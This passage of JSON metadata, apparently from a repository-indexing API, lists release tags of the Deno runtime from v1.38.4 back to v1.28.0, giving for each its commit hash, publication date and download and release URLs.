d%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms